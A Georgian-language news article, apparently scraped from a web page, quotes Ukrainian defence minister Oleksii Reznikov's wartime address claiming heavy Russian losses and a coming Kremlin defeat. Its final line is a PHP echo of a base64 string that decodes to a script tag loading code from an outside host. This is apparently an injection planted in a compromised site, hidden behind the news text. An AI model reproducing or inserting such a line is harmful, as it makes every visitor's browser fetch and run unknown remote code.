celsiusi
ავერსი საქკაბელი
რუსმა ოკუპანტებმა ვერ დაგვანგრეს, ვერ დაგვატეხეს. და მათ არ შეუძლიათ! უკრაინის თითოეული მოქალაქე აგრძელებს ჩვენი ქვეყნის, ჩვენი სიცოცხლის დაცვას, - ამის შესახებ უკრაინის თავდაცვის მინისტრის, ალექსეი რეზნიკოვის მიერ სოციალურ ქსელში გავრცელებულ მიმართვაშია ნათქვამი.
 
როგორც მან აღნიშნა, უკრაინისთვის საბრძოლო პოზიციებზე არსებული სიტუაცია კონტროლს ექვემდებარება.
 
„დიახ, დანაკარგიც გვაქვს, მაგრამ ყოველი სახელი, თითოეული ჩვენი გმირი არ იქნება დავიწყებული. ყველა უკრაინელის სიცოცხლე ფასდაუდებელია! გარკვეული მიმართულებებით ჩვენი ჯარისკაცების კონტრშეტევა მიმდინარეობს, მტერი კარგავს ათეულობით ერთეულ აღჭურვილობას, უბრალოდ ისვრის და გარბის, რითაც ის ჩვენს არსენალს აღჭურვილობით ავსებს. მტერი საკუთარი იარაღიდანვე მოკვდება“, - აღნიშნა რეზნიკოვმა.
 
მიმართვაში მან ასევე განაცხადა, რომ „კრემლს ჯერ არ სურს მიიღოს და აღიაროს მარცხი“, რომელიც, უკრაინის თავდაცვის მინისტრის თქმით, „ძალიან ახლოსაა“.
 
„საოკუპაციო ძალებს შორის უკმაყოფილება და დემორალიზება იზრდება. მტერი მნიშვნელოვან დანაკარგებს განიცდის. განადგურდა თითქმის 90 თვითმფრინავი და შვეულმფრენი. ჩვენმა კიბორგებმა მტრის რამდენიმე მფრინავი დაატყვევეს - მომავალ სამხედრო ტრიბუნალზე ისინი მნიშვნელოვანი მოწმეები იქნებიან. მაშინ, როდესაც ვიღაცას უკრაინაში ცის დახურვის ეშინია, ჩვენი არმია თავის საქმეს თავს ართმევს და მტერს ანადგურებს“, - განაცხადა უკრაინის თავდაცვის მინისტრმა,
 
მისივე თქმით, უკვე დაუფარავია კრემლის განზრახვა უკრაინის განადგურების შესახებ.
 
„კრემლმა საბოლოოდ უარყო თავისი განზრახვების დამალვის მცდელობები - ისინი მოვიდნენ ჩვენი ქვეყნისა და ხალხის დასანგრევად. ისინი ომობენ ქალებთან და ბავშვებთან. როდესაც მათ ვერ დაამარცხეს ხარკოვის დამცველი ჯარისკაცები, მათ დაიწყეს ომი ხარკოვის უნივერსიტეტთან. რუსები ჩვეულებრივი ტერორისტები არიან და ტერორისტები აუცილებლად განადგურდებიან“, - ამბობს თავდაცვის მინისტრი.
791
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");